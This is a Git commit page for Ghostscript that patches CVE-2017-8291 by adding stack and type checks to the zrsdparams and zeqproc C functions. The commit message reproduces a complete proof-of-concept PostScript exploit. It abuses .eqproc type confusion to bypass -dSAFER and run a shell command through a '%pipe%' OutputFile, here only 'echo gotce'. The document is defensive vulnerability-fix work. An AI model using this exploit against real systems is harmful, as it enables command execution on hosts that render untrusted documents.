gs: apply mitigations against CVE-2017-8291 (thanks jsmoody)
To reproduce: gs -q -dNOPAUSE -dSAFER '-sDEVICE=ppmraw' '-sOutputFile=/dev/null' <<. %!PS-Adobe-3.0 EPSF-3.0 %%BoundingBox: -0 -0 100 100 /size_from 10000 def /size_step 500 def /size_to 65000 def /enlarge 1000 def %/bigarr 65000 array def 0 size_from size_step size_to { pop 1 add } for /buffercount exch def /buffersizes buffercount array def 0 size_from size_step size_to { buffersizes exch 2 index exch put 1 add } for pop /buffers buffercount array def 0 1 buffercount 1 sub { /ind exch def buffersizes ind get /cursize exch def cursize string /curbuf exch def buffers ind curbuf put cursize 16 sub 1 cursize 1 sub { curbuf exch 255 put } for } for /buffersearchvars [0 0 0 0 0] def /sdevice [0] def enlarge array aload { .eqproc buffersearchvars 0 buffersearchvars 0 get 1 add put buffersearchvars 1 0 put buffersearchvars 2 0 put buffercount { buffers buffersearchvars 1 get get buffersizes buffersearchvars 1 get get 16 sub get 254 le { buffersearchvars 2 1 put buffersearchvars 3 buffers buffersearchvars 1 get get put buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put } if buffersearchvars 1 buffersearchvars 1 get 1 add put } repeat buffersearchvars 2 get 1 ge { exit } if %(.) print } loop .eqproc .eqproc .eqproc sdevice 0 currentdevice buffersearchvars 3 get buffersearchvars 4 get 16#7e put buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put put buffersearchvars 0 get array aload sdevice 0 get 16#3e8 0 put sdevice 0 get 16#3b0 0 put sdevice 0 get 16#3f0 0 put currentdevice null false mark /OutputFile (%pipe%echo gotce) .putdeviceparams 1 true .outputpage .rsdparams %{ } loop 0 0 .quit %asdf .
This commit is contained in:
parent
b767b2ce23
commit
0af7d1fe35
2 changed files with 21 additions and 7 deletions
|
@ -47,13 +47,19 @@ zrsdparams(i_ctx_t *i_ctx_p)
|
|||
ref *pFilter;
|
||||
ref *pDecodeParms;
|
||||
int Intent;
|
||||
bool AsyncRead;
|
||||
bool AsyncRead = false;
|
||||
ref empty_array, filter1_array, parms1_array;
|
||||
uint i;
|
||||
int code;
|
||||
int code = 0;
|
||||
|
||||
if (ref_stack_count(&o_stack) < 1)
|
||||
return_error(e_stackunderflow);
|
||||
if (!r_has_type(op, t_dictionary) && !r_has_type(op, t_null))
|
||||
return_error(e_typecheck);
|
||||
|
||||
make_empty_array(&empty_array, a_readonly);
|
||||
if (dict_find_string(op, "Filter", &pFilter) > 0) {
|
||||
if (r_has_type(op, t_dictionary)
|
||||
&& dict_find_string(op, "Filter", &pFilter) > 0) {
|
||||
if (!r_is_array(pFilter)) {
|
||||
if (!r_has_type(pFilter, t_name))
|
||||
return_error(e_typecheck);
|
||||
|
@ -92,10 +98,12 @@ zrsdparams(i_ctx_t *i_ctx_p)
|
|||
return_error(e_typecheck);
|
||||
}
|
||||
}
|
||||
if ((code = dict_int_param(op, "Intent", 0, 3, 0, &Intent)) < 0 ||
|
||||
(code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0
|
||||
)
|
||||
return code;
|
||||
if (r_has_type(op, t_dictionary))
|
||||
code = dict_int_param(op, "Intent", 0, 3, 0, &Intent);
|
||||
|
||||
if (r_has_type(op, t_dictionary))
|
||||
if ((code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0)
|
||||
return code;
|
||||
push(1);
|
||||
op[-1] = *pFilter;
|
||||
if (pDecodeParms)
|
||||
|
|
|
@ -55,6 +55,12 @@ zeqproc(i_ctx_t *i_ctx_p)
|
|||
ref2_t stack[MAX_DEPTH + 1];
|
||||
ref2_t *top = stack;
|
||||
|
||||
if (ref_stack_count(&o_stack) < 2)
|
||||
return_error(e_stackunderflow);
|
||||
if (!r_is_array(op - 1) || !r_is_array(op)) {
|
||||
return_error(e_typecheck);
|
||||
}
|
||||
|
||||
make_array(&stack[0].proc1, 0, 1, op - 1);
|
||||
make_array(&stack[0].proc2, 0, 1, op);
|
||||
for (;;) {
|
||||
|
|
Loading…
Reference in a new issue